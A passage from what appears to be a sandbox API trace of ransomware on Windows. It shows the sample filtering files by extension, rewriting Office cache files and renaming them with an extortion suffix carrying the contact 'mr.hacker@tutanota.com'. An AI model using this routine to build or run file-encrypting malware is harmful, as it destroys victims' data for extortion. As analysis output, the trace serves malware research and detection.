lpOverlapped=0x0) returned 1 [0040.912] ReadFile (in: hFile=0x1f0, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.912] WriteFile (in: hFile=0x170, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.912] SetEndOfFile (hFile=0x170) returned 1 [0040.912] CloseHandle (hObject=0x170) returned 1 [0041.084] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.084] SetEndOfFile (hFile=0x1f0) returned 1 [0041.097] CloseHandle (hObject=0x1f0) returned 1 [0041.097] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0041.097] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi")) returned 1 [0041.098] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.098] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.098] lstrlenW (lpString=".doc") returned 4 [0041.098] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.098] lstrlenW (lpString=".docx") returned 5 [0041.098] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0041.098] lstrlenW (lpString=".pdf") returned 4 [0041.098] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.098] lstrlenW (lpString=".xls") returned 4 [0041.098] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.098] lstrlenW (lpString=".xlsx") returned 5 [0041.098] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0041.098] lstrlenW (lpString=".ppt") returned 4 [0041.098] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.098] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.098] lstrlenW (lpString=".zip") returned 4 [0041.098] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.098] lstrlenW (lpString=".rar") returned 4 [0041.098] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.098] lstrlenW (lpString=".bz2") returned 4 [0041.098] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.098] lstrlenW (lpString=".7z") returned 3 [0041.098] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.098] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.098] lstrlenW (lpString=".dbf") returned 4 [0041.098] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.098] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.098] lstrlenW (lpString=".1cd") returned 4 [0041.098] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.098] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.098] lstrlenW (lpString=".jpg") returned 4 [0041.098] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.098] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.099] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.099] lstrlenW (lpString=".doc") returned 4 [0041.099] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.099] lstrlenW (lpString=".docx") returned 5 [0041.099] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0041.099] lstrlenW (lpString=".pdf") returned 4 [0041.099] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.099] lstrlenW (lpString=".xls") returned 4 [0041.099] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.099] lstrlenW (lpString=".xlsx") returned 5 [0041.099] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0041.099] lstrlenW (lpString=".ppt") returned 4 [0041.099] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.099] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.099] lstrlenW (lpString=".zip") returned 4 [0041.099] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.099] lstrlenW (lpString=".rar") returned 4 [0041.099] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.099] lstrlenW (lpString=".bz2") returned 4 [0041.099] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.099] lstrlenW (lpString=".7z") returned 3 [0041.099] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.099] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.099] lstrlenW (lpString=".dbf") returned 4 [0041.099] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.099] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.099] lstrlenW (lpString=".1cd") returned 4 [0041.099] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.099] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.099] lstrlenW (lpString=".jpg") returned 4 [0041.099] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.099] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0041.100] lstrlenW (lpString="Proof.msi") returned 9 [0041.100] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0041.298] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=881152) returned 1 [0041.298] CloseHandle (hObject=0x1ec) returned 1 [0041.298] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi")) returned 0x2020 [0041.298] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.298] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0041.298] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.298] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.298] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0041.299] GetLastError () returned 0x0 [0041.299] ReadFile (in: hFile=0x1ec, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0xd7200, lpOverlapped=0x0) returned 1 [0041.318] WriteFile (in: hFile=0x19c, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xd7210, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xd7210, lpOverlapped=0x0) returned 1 [0041.662] ReadFile (in: hFile=0x1ec, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.662] WriteFile (in: hFile=0x19c, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.662] SetEndOfFile (hFile=0x19c) returned 1 [0041.662] CloseHandle (hObject=0x19c) returned 1 [0041.695] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.695] SetEndOfFile (hFile=0x1ec) returned 1 [0041.702] CloseHandle (hObject=0x1ec) returned 1 [0041.702] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0041.703] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi")) returned 1 [0041.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.703] lstrlenW (lpString=".doc") returned 4 [0041.703] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.703] lstrlenW (lpString=".docx") returned 5 [0041.703] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0041.703] lstrlenW (lpString=".pdf") returned 4 [0041.703] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.703] lstrlenW (lpString=".xls") returned 4 [0041.703] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.703] lstrlenW (lpString=".xlsx") returned 5 [0041.703] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0041.703] lstrlenW (lpString=".ppt") returned 4 [0041.703] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.703] lstrlenW (lpString=".zip") returned 4 [0041.703] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.703] lstrlenW (lpString=".rar") returned 4 [0041.703] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.703] lstrlenW (lpString=".bz2") returned 4 [0041.703] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.703] lstrlenW (lpString=".7z") returned 3 [0041.703] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.703] lstrlenW (lpString=".dbf") returned 4 [0041.703] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.703] lstrlenW (lpString=".1cd") returned 4 [0041.704] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.704] lstrlenW (lpString=".jpg") returned 4 [0041.704] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.704] lstrlenW (lpString=".doc") returned 4 [0041.704] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.704] lstrlenW (lpString=".docx") returned 5 [0041.704] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0041.704] lstrlenW (lpString=".pdf") returned 4 [0041.704] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.704] lstrlenW (lpString=".xls") returned 4 [0041.704] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.704] lstrlenW (lpString=".xlsx") returned 5 [0041.704] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0041.704] lstrlenW (lpString=".ppt") returned 4 [0041.704] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.704] lstrlenW (lpString=".zip") returned 4 [0041.704] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.704] lstrlenW (lpString=".rar") returned 4 [0041.704] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.704] lstrlenW (lpString=".bz2") returned 4 [0041.704] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.704] lstrlenW (lpString=".7z") returned 3 [0041.704] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.704] lstrlenW (lpString=".dbf") returned 4 [0041.704] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.704] lstrlenW (lpString=".1cd") returned 4 [0041.704] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.705] lstrlenW (lpString=".jpg") returned 4 [0041.705] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.705] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0041.705] lstrlenW (lpString="Proof.cab") returned 9 [0041.705] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0041.705] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=21064532) returned 1 [0041.705] CloseHandle (hObject=0x1ec) returned 1 [0041.705] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab")) returned 0x2020 [0041.705] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.705] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0041.967] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0041.967] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0x0) returned 1 [0041.967] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.967] ReadFile (in: hFile=0x1ec, lpBuffer=0x3de0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3de0058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.231] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x6b23c6, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.232] ReadFile (in: hFile=0x1ec, lpBuffer=0x3e20058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e20058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.234] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0042.234] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x13d6b54, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.234] ReadFile (in: hFile=0x1ec, lpBuffer=0x3e60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e60058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.251] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.251] WriteFile (in: hFile=0x1ec, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x375fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0042.265] SetEndOfFile (hFile=0x1ec) returned 1 [0042.265] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3ff70d8 [0042.269] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.269] WriteFile (in: hFile=0x1ec, lpBuffer=0x3ff70d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ff70d8*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.270] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x6b23c6, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.270] WriteFile (in: hFile=0x1ec, lpBuffer=0x3ff70d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ff70d8*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.270] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x13d6b54, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.270] WriteFile (in: hFile=0x1ec, lpBuffer=0x3ff70d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ff70d8*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.272] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3ff70d8 | out: hHeap=0x5d0000) returned 1 [0042.272] CloseHandle (hObject=0x1ec) returned 1 [0045.404] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0045.405] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.405] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.405] lstrlenW (lpString=".doc") returned 4 [0045.405] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.405] lstrlenW (lpString=".docx") returned 5 [0045.405] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0045.405] lstrlenW (lpString=".pdf") returned 4 [0045.405] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.405] lstrlenW (lpString=".xls") returned 4 [0045.405] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.405] lstrlenW (lpString=".xlsx") returned 5 [0045.405] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0045.405] lstrlenW (lpString=".ppt") returned 4 [0045.405] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.405] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.405] lstrlenW (lpString=".zip") returned 4 [0045.405] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.405] lstrlenW (lpString=".rar") returned 4 [0045.405] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.405] lstrlenW (lpString=".bz2") returned 4 [0045.405] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.405] lstrlenW (lpString=".7z") returned 3 [0045.405] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.405] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.405] lstrlenW (lpString=".dbf") returned 4 [0045.405] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.405] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.405] lstrlenW (lpString=".1cd") returned 4 [0045.406] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.406] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.406] lstrlenW (lpString=".jpg") returned 4 [0045.406] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.406] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.406] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.406] lstrlenW (lpString=".doc") returned 4 [0045.406] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.406] lstrlenW (lpString=".docx") returned 5 [0045.406] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0045.406] lstrlenW (lpString=".pdf") returned 4 [0045.406] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.406] lstrlenW (lpString=".xls") returned 4 [0045.406] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.406] lstrlenW (lpString=".xlsx") returned 5 [0045.406] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0045.406] lstrlenW (lpString=".ppt") returned 4 [0045.406] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.406] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.406] lstrlenW (lpString=".zip") returned 4 [0045.406] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.406] lstrlenW (lpString=".rar") returned 4 [0045.406] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.406] lstrlenW (lpString=".bz2") returned 4 [0045.406] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.406] lstrlenW (lpString=".7z") returned 3 [0045.406] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.406] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.406] lstrlenW (lpString=".dbf") returned 4 [0045.406] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.406] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.406] lstrlenW (lpString=".1cd") returned 4 [0045.406] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.406] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.407] lstrlenW (lpString=".jpg") returned 4 [0045.407] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.407] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0045.407] lstrlenW (lpString="VisioMUI.msi") returned 12 [0045.407] CreateFileW (lpFileName="C:\\MSOCache\\All 